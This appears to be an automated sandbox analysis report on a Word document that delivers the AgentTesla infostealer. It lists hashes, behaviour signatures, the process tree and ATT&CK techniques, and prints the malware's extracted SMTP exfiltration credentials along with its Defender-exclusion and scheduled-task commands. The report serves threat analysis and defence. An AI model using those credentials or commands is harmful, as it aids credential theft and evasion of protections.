Overview

overview

10

Static

static

10

Bank Depos...8.docx

windows7-x64

10

Bank Depos...8.docx

windows10-2004-x64

1

Analysis

  • max time kernel
    143s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    14-03-2023 06:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Bank Deposit Slip 230228.docx

  • Size

    10KB

  • MD5

    2105fbcf7af88cca80cbdae1768bd87a

  • SHA1

    4af4b2bdd5324d83c69cd31c12dd4efd0b14281d

  • SHA256

    36b207f1cf4470480efbaf303ce82a8214d1c40e3b991f6e3646c04fb0557138

  • SHA512

    adb9ebcabaa6a6b5a3fc0f44390e2bed1a47c7ea976baa3d9f192d1a38664fa70ad620f55a4859cfbf8a9d7e915c2144ff212db4d7d9a9ef5e75bebbcbb70c62

  • SSDEEP

    192:ScIMmtP1aIG/bslPL++uO5ebl+CVWBXJC0c3fJ:SPXU/slT+LOkbHkZC9x

Score
10/10
agentteslacollectionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.palumalimited.com
  • Port:
    587
  • Username:
    novlove@palumalimited.com
  • Password:
    85h!UAfvL2AE
  • Email To:
    mullarred@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank Deposit Slip 230228.docx"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:300
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Users\Public\vbc.exe
        "C:\Users\Public\vbc.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:856
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\zPpcDIHvTRqjgg.exe"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zPpcDIHvTRqjgg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1C19.tmp"
          3⤵
          • Creates scheduled task(s)
          PID:1808
        • C:\Users\Public\vbc.exe
          "C:\Users\Public\vbc.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1576

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scripting

    1
    T1064

    Scheduled Task

    1
    T1053

    Exploitation for Client Execution

    1
    T1203

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Scripting

    1
    T1064

    Modify Registry

    2
    T1112

    Credential Access

    Credentials in Files

    3
    T1081

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Data from Local System

    3
    T1005

    Email Collection

    1
    T1114

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
      Filesize

      128KB

      MD5

      2d975bb768ff7bdaeb72d09c330a0bc6

      SHA1

      8713a5dd17ac40cda515388c123807fccd7b7c5e

      SHA256

      e9e373777f494acce91b9064d66955977d128b522ffd92cfada8f12cc06cf826

      SHA512

      7179d633b7d3e2c5a4e165c9183a11653a4bdecc669cc94756c6f30cf29a54e61803c6057dc2e0e430e846aa03f795468e1803f915e403179f4712c1adc69077

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0A3F849B-4A5F-499B-91FA-82D3BA9F4308}.FSD
      Filesize

      128KB

      MD5

      8213d02595bef055af68874108838487

      SHA1

      36d5d025ba2ec438d55fb64d7faa0433e104d9c7

      SHA256

      c1d9d31e40e056c66ecaf1445f28133e0561cb609ec302c002ee0adcb1ebc4dc

      SHA512

      95daeadf8127550cc03d899a0a97c2ff4f557db2391b2321ce4893b4bf7e8e96617adf4f72fc4bc4c50c8ab8b8e5dda407b70015c2976005568d8e28628e83f4

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UOYUJSME\73...................73[1].doc
      Filesize

      9KB

      MD5

      43310cefffed429d066f31a3cf342465

      SHA1

      f21af8d20f4abcacdcebbaa67035087f13400340

      SHA256

      1a02fb05dd2188052c7a68068bb776abcc2cf83f0dbbc53420a5a81518357656

      SHA512

      2c6a721fda47e194a6c410397c0a6080133d4127fa181bdabd62aab66fc473072be60b07834873cc2e100024d734bb9d1e9fad2a02824a99f10ccaddd52d7b1c

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp1C19.tmp
      Filesize

      1KB

      MD5

      4e10c816237df549e67a63219a9d18fe

      SHA1

      534d2e6ca282a945c004861888c57b2bf0fbc2f5

      SHA256

      830e87b3a717c175db47461a364b3ac1186d0ea6071e9b149f5fbb15c9c22666

      SHA512

      646a8798a177dc435e8bff99c368d5f2ae28927f60352947cae59ae62fdf9e06088360e0479fa952c9a93e02dae0d250541da520e5aab8e327a987b86bfa41a7

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\{AC9845F2-DDED-4FCF-A945-9C7C6B13E117}
      Filesize

      128KB

      MD5

      819d9d7d4c8d634e8281e2512bf9fa84

      SHA1

      13fa7991eafd11b2e03e0ebfc58a343da7ab1576

      SHA256

      8c66518996b86a90e895ab687cc9ec238401b6cb4c54c6eac822971d0819e3fb

      SHA512

      257093a71feefee56385cf7d459b39b75174bc4c532aec1523cc90e49b5d161721f39a1938f635226db2138036e18955d4b3c84e52696c9687dcfea30a4190f5

      Download Submit
    • C:\Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

      Download Submit
    • C:\Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

      Download Submit
    • C:\Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

      Download Submit
    • C:\Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

      Download Submit
    • \Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

      Download Submit
    • memory/856-152-0x0000000005750000-0x0000000005806000-memory.dmp
      Filesize

      728KB

      Download
    • memory/856-143-0x00000000009A0000-0x00000000009BA000-memory.dmp
      Filesize

      104KB

      Download
    • memory/856-150-0x0000000000F90000-0x0000000000FD0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/856-151-0x0000000000590000-0x000000000059C000-memory.dmp
      Filesize

      48KB

      Download
    • memory/856-142-0x0000000000F90000-0x0000000000FD0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/856-160-0x0000000000F60000-0x0000000000F66000-memory.dmp
      Filesize

      24KB

      Download
    • memory/856-161-0x0000000004570000-0x00000000045B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/856-141-0x0000000001020000-0x0000000001108000-memory.dmp
      Filesize

      928KB

      Download
    • memory/864-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1556-175-0x00000000028E0000-0x0000000002920000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1556-174-0x00000000028E0000-0x0000000002920000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1576-166-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1576-165-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-167-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-164-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-170-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-172-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-173-0x0000000004D80000-0x0000000004DC0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1576-163-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-162-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1576-177-0x0000000004D80000-0x0000000004DC0000-memory.dmp
      Filesize

      256KB

      Download